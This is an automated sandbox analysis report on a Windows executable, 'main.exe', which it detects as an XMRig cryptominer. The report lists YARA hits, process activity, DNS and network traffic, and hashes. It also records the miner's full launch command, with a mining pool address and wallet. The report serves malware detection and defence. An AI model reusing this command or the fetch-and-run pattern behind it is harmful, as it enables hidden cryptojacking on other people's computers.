xmrig | 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

max time kernel
1798s
max time network
1790s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
30/12/2023, 23:48 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main.exe
Size

6.9MB
MD5

22c978ffaefef3389bf29068b9621661
SHA1

5671972c1d70826fb85dced4c83c700dd282ea21
SHA256

e6ee8e9b38e10a92a89e61b8655ca4fedcc381fd93cb36f43fe323132923dfcf
SHA512

8a280cb782f0afab171d2e7955b75362e98cefd449d382004ef2568c2c230cd633a754b1dd5f0dc5e17407819e4dceb5b0cbb2647e279a6ec674b8d9484be26a
SSDEEP

98304:7b5Ak7khMiyw0VREqfnle5EEPbxVhCQHSIMf:5LUMiywZqshDxaQHh

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 37 IoCs

miner

resource	yara_rule
behavioral20/files/0x000600000002324d-13.dat	family_xmrig
behavioral20/files/0x000600000002324d-13.dat	xmrig
behavioral20/memory/3744-16-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-17-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-20-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-21-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-24-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-25-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-26-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-27-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-28-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-29-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-30-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-31-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-32-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-33-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-34-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-35-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-36-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-37-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-38-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-39-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-40-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-41-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-42-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-43-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-44-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-45-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-46-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-47-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-48-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-49-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-50-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-51-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-52-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-53-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig
behavioral20/memory/3744-54-0x00007FF613110000-0x00007FF613C13000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Executes dropped EXE 1 IoCs

pid	Process
3744	xmrig.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	3744	xmrig.exe
Token: SeLockMemoryPrivilege	3744	xmrig.exe
Token: SeManageVolumePrivilege	3312	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3744	xmrig.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2284 wrote to memory of 3744	2284	main.exe	100
PID 2284 wrote to memory of 3744	2284	main.exe	100

C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2284
- C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
  xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:3744

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:4528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3312

Network

DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.a-0001.a-msedge.net

g-bing-com.a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=36279BEA688B63140684881269AC6247; domain=.bing.com; expires=Fri, 24-Jan-2025 08:35:35 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 04D19DBFC700431CAE63B6015FB573C5 Ref B: LON04EDGE0710 Ref C: 2023-12-31T08:35:35Z
date: Sun, 31 Dec 2023 08:35:34 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=36279BEA688B63140684881269AC6247

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=wY-mmihZ8s_9U3v8aRd8Empt4xYZsrV9BjupD1TOcWo; domain=.bing.com; expires=Fri, 24-Jan-2025 08:35:35 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 002BEF108E134BC4956F3F2C28B9A6F0 Ref B: LON04EDGE0710 Ref C: 2023-12-31T08:35:35Z
date: Sun, 31 Dec 2023 08:35:34 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=36279BEA688B63140684881269AC6247; MSPTC=wY-mmihZ8s_9U3v8aRd8Empt4xYZsrV9BjupD1TOcWo

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 882E522020634633B407D8ACED475628 Ref B: LON04EDGE0710 Ref C: 2023-12-31T08:35:35Z
date: Sun, 31 Dec 2023 08:35:35 GMT
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR

Response
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR
DNS

21.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.177.190.20.in-addr.arpa

IN PTR

Response
DNS

21.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.177.190.20.in-addr.arpa

IN PTR
DNS

21.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.177.190.20.in-addr.arpa

IN PTR
DNS

21.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.177.190.20.in-addr.arpa

IN PTR
DNS

21.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.177.190.20.in-addr.arpa

IN PTR
DNS

79.121.231.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.121.231.20.in-addr.arpa

IN PTR

Response
DNS

79.121.231.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.121.231.20.in-addr.arpa

IN PTR
DNS

79.121.231.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.121.231.20.in-addr.arpa

IN PTR
DNS

github.com

main.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

140.82.121.4
DNS

objects.githubusercontent.com

main.exe

Remote address:

8.8.8.8:53

Request

objects.githubusercontent.com

IN A

Response

objects.githubusercontent.com

IN A

185.199.109.133

objects.githubusercontent.com

IN A

185.199.108.133

objects.githubusercontent.com

IN A

185.199.111.133

objects.githubusercontent.com

IN A

185.199.110.133
DNS

4.121.82.140.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.121.82.140.in-addr.arpa

IN PTR

Response

4.121.82.140.in-addr.arpa

IN PTR

lb-140-82-121-4-fragithubcom
DNS

4.121.82.140.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.121.82.140.in-addr.arpa

IN PTR
DNS

4.121.82.140.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.121.82.140.in-addr.arpa

IN PTR
DNS

0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR

Response

0.205.248.87.in-addr.arpa

IN PTR

https-87-248-205-0lgwllnwnet
DNS

0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR
DNS

0.205.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.205.248.87.in-addr.arpa

IN PTR
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

67.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.31.126.40.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

217.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.135.221.88.in-addr.arpa

IN PTR

Response

217.135.221.88.in-addr.arpa

IN PTR

a88-221-135-217deploystaticakamaitechnologiescom
DNS

104.241.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.241.123.92.in-addr.arpa

IN PTR

Response

104.241.123.92.in-addr.arpa

IN PTR

a92-123-241-104deploystaticakamaitechnologiescom
DNS

104.241.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.241.123.92.in-addr.arpa

IN PTR
DNS

104.241.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.241.123.92.in-addr.arpa

IN PTR
DNS

104.241.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.241.123.92.in-addr.arpa

IN PTR
DNS

104.241.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.241.123.92.in-addr.arpa

IN PTR
DNS

119.110.54.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

119.110.54.20.in-addr.arpa

IN PTR

Response
DNS

119.110.54.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

119.110.54.20.in-addr.arpa

IN PTR
DNS

pool.hashvault.pro

xmrig.exe

Remote address:

8.8.8.8:53

Request

pool.hashvault.pro

IN A

Response

pool.hashvault.pro

IN A

45.76.89.70

pool.hashvault.pro

IN A

95.179.241.203
DNS

pool.hashvault.pro

xmrig.exe

Remote address:

8.8.8.8:53

Request

pool.hashvault.pro

IN A
DNS

203.241.179.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.241.179.95.in-addr.arpa

IN PTR

Response

203.241.179.95.in-addr.arpa

IN PTR

95179241203vultrusercontentcom
DNS

203.241.179.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.241.179.95.in-addr.arpa

IN PTR
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR

Response

194.178.17.96.in-addr.arpa

IN PTR

a96-17-178-194deploystaticakamaitechnologiescom
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR
DNS

194.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.178.17.96.in-addr.arpa

IN PTR
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR
DNS

176.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

176.178.17.96.in-addr.arpa

IN PTR

Response

176.178.17.96.in-addr.arpa

IN PTR

a96-17-178-176deploystaticakamaitechnologiescom
DNS

176.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

176.178.17.96.in-addr.arpa

IN PTR
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR

Response

18.134.221.88.in-addr.arpa

IN PTR

a88-221-134-18deploystaticakamaitechnologiescom
DNS

18.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.134.221.88.in-addr.arpa

IN PTR
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

204.79.197.200:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid=

tls, http2

2.5kB
9.3kB
23
17

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5a68602ed4dc4b25aa9d679f7a19f8b2&localId=w:CB46C7AD-3FBE-4EAF-8E4F-46C212B95A7B&deviceId=6896190258833704&anid=

HTTP Response

204
140.82.121.4:443

github.com

tls

main.exe

2.0kB
7.2kB
19
16
185.199.109.133:443

objects.githubusercontent.com

tls

main.exe

120.6kB
3.5MB
2233
2617
95.179.241.203:80

pool.hashvault.pro

tls

xmrig.exe

30.3kB
67.2kB
238
177
96.17.178.176:80
96.17.178.176:80
96.17.178.176:80
96.17.178.176:80
96.17.178.176:80
96.17.178.176:80
96.17.178.176:80
96.17.178.176:80
96.17.178.176:80
96.17.178.176:80
87.248.205.0:80
88.221.134.32:80
88.221.134.18:80
88.221.134.18:80
87.248.205.0:80
87.248.205.0:80
88.221.135.217:80
87.248.205.0:80
88.221.135.217:80
87.248.205.0:80
87.248.205.0:80
96.16.110.114:80

40 B
1
96.16.110.114:80
96.16.110.114:80
138.91.171.81:80
52.142.223.178:80

8.8.8.8:53

g.bing.com

dns

56 B
158 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

59.128.231.4.in-addr.arpa

dns

355 B
157 B
5
1

DNS Request

59.128.231.4.in-addr.arpa

DNS Request

59.128.231.4.in-addr.arpa

DNS Request

59.128.231.4.in-addr.arpa

DNS Request

59.128.231.4.in-addr.arpa

DNS Request

59.128.231.4.in-addr.arpa
8.8.8.8:53

21.177.190.20.in-addr.arpa

dns

360 B
158 B
5
1

DNS Request

21.177.190.20.in-addr.arpa

DNS Request

21.177.190.20.in-addr.arpa

DNS Request

21.177.190.20.in-addr.arpa

DNS Request

21.177.190.20.in-addr.arpa

DNS Request

21.177.190.20.in-addr.arpa
8.8.8.8:53

79.121.231.20.in-addr.arpa

dns

216 B
158 B
3
1

DNS Request

79.121.231.20.in-addr.arpa

DNS Request

79.121.231.20.in-addr.arpa

DNS Request

79.121.231.20.in-addr.arpa
8.8.8.8:53

github.com

dns

main.exe

56 B
72 B
1
1

DNS Request

github.com

DNS Response

140.82.121.4
8.8.8.8:53

objects.githubusercontent.com

dns

main.exe

75 B
139 B
1
1

DNS Request

objects.githubusercontent.com

DNS Response

185.199.109.133

185.199.108.133

185.199.111.133

185.199.110.133
8.8.8.8:53

4.121.82.140.in-addr.arpa

dns

213 B
115 B
3
1

DNS Request

4.121.82.140.in-addr.arpa

DNS Request

4.121.82.140.in-addr.arpa

DNS Request

4.121.82.140.in-addr.arpa
8.8.8.8:53

0.205.248.87.in-addr.arpa

dns

213 B
116 B
3
1

DNS Request

0.205.248.87.in-addr.arpa

DNS Request

0.205.248.87.in-addr.arpa

DNS Request

0.205.248.87.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

219 B
144 B
3
1

DNS Request

95.221.229.192.in-addr.arpa

DNS Request

95.221.229.192.in-addr.arpa

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

284 B
157 B
4
1

DNS Request

43.58.199.20.in-addr.arpa

DNS Request

43.58.199.20.in-addr.arpa

DNS Request

43.58.199.20.in-addr.arpa

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

67.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

67.31.126.40.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

217.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

217.135.221.88.in-addr.arpa
8.8.8.8:53

104.241.123.92.in-addr.arpa

dns

365 B
139 B
5
1

DNS Request

104.241.123.92.in-addr.arpa

DNS Request

104.241.123.92.in-addr.arpa

DNS Request

104.241.123.92.in-addr.arpa

DNS Request

104.241.123.92.in-addr.arpa

DNS Request

104.241.123.92.in-addr.arpa
8.8.8.8:53

119.110.54.20.in-addr.arpa

dns

144 B
158 B
2
1

DNS Request

119.110.54.20.in-addr.arpa

DNS Request

119.110.54.20.in-addr.arpa
8.8.8.8:53

pool.hashvault.pro

dns

xmrig.exe

128 B
96 B
2
1

DNS Request

pool.hashvault.pro

DNS Request

pool.hashvault.pro

DNS Response

45.76.89.70

95.179.241.203
8.8.8.8:53

203.241.179.95.in-addr.arpa

dns

146 B
122 B
2
1

DNS Request

203.241.179.95.in-addr.arpa

DNS Request

203.241.179.95.in-addr.arpa
8.8.8.8:53

194.178.17.96.in-addr.arpa

dns

288 B
137 B
4
1

DNS Request

194.178.17.96.in-addr.arpa

DNS Request

194.178.17.96.in-addr.arpa

DNS Request

194.178.17.96.in-addr.arpa

DNS Request

194.178.17.96.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

144 B
158 B
2
1

DNS Request

13.227.111.52.in-addr.arpa

DNS Request

13.227.111.52.in-addr.arpa
8.8.8.8:53

176.178.17.96.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

176.178.17.96.in-addr.arpa

DNS Request

176.178.17.96.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

292 B
144 B
4
1

DNS Request

240.221.184.93.in-addr.arpa

DNS Request

240.221.184.93.in-addr.arpa

DNS Request

240.221.184.93.in-addr.arpa

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

18.134.221.88.in-addr.arpa

dns

144 B
137 B
2
1

DNS Request

18.134.221.88.in-addr.arpa

DNS Request

18.134.221.88.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

216 B
3

DNS Request

56.126.166.20.in-addr.arpa

DNS Request

56.126.166.20.in-addr.arpa

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53
8.8.8.8:53
8.8.8.8:53
8.8.8.8:53
8.8.8.8:53
8.8.8.8:53
8.8.8.8:53

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Filesize
2.2MB

MD5
069cf4a516b7672e092a16e8db0069f8

SHA1
2b09e06316ad65e45477ad13ad95b12e76e0a0d1

SHA256
648025a1d8e9ecf64caa0e777ff602793e4f8734db47ab145150b7aa55cc7793

SHA512
1b3266cb25660fbd4fc4d2de18b4b0e475f9eed2e94296c08ad1df34c74f9ec532c581b6c2296157c3a42d98407c74eb8eadb1e0ad74f2b14c5d31cb799c9c64

Download Submit
memory/3312-71-0x000001C375540000-0x000001C375550000-memory.dmp

Filesize
64KB

Download
memory/3312-55-0x000001C375440000-0x000001C375450000-memory.dmp

Filesize
64KB

Download
memory/3744-35-0x00007FF613110000-0x00007FF613C13000-memory.dmp

Filesize
11.0MB

Download
memory/3744-37-0x00007FF613110000-0x00007FF613C13000-memory.dmp

Filesize
11.0MB

Download
memory/3744-18-0x000001A5AC1A0000-0x000001A5AC1C0000-memory.dmp

Filesize
128KB

Download
memory/3744-19-0x000001A5AC1C0000-0x000001A5AC1E0000-memory.dmp

Filesize
128KB

Download
memory/3744-20-0x00007FF613110000-0x00007FF613C13000-memory.dmp

Filesize
11.0MB

Download
memory/3744-21-0x00007FF613110000-0x00007FF613C13000-memory.dmp

Filesize
11.0MB

Download
memory/3744-22-0x000001A5AC1A0000-0x000001A5AC1C0000-memory.dmp

Filesize
128KB

Download
memory/3744-23-0x000001A5AC1C0000-0x000001A5AC1E0000-memory.dmp

Filesize
128KB

Download
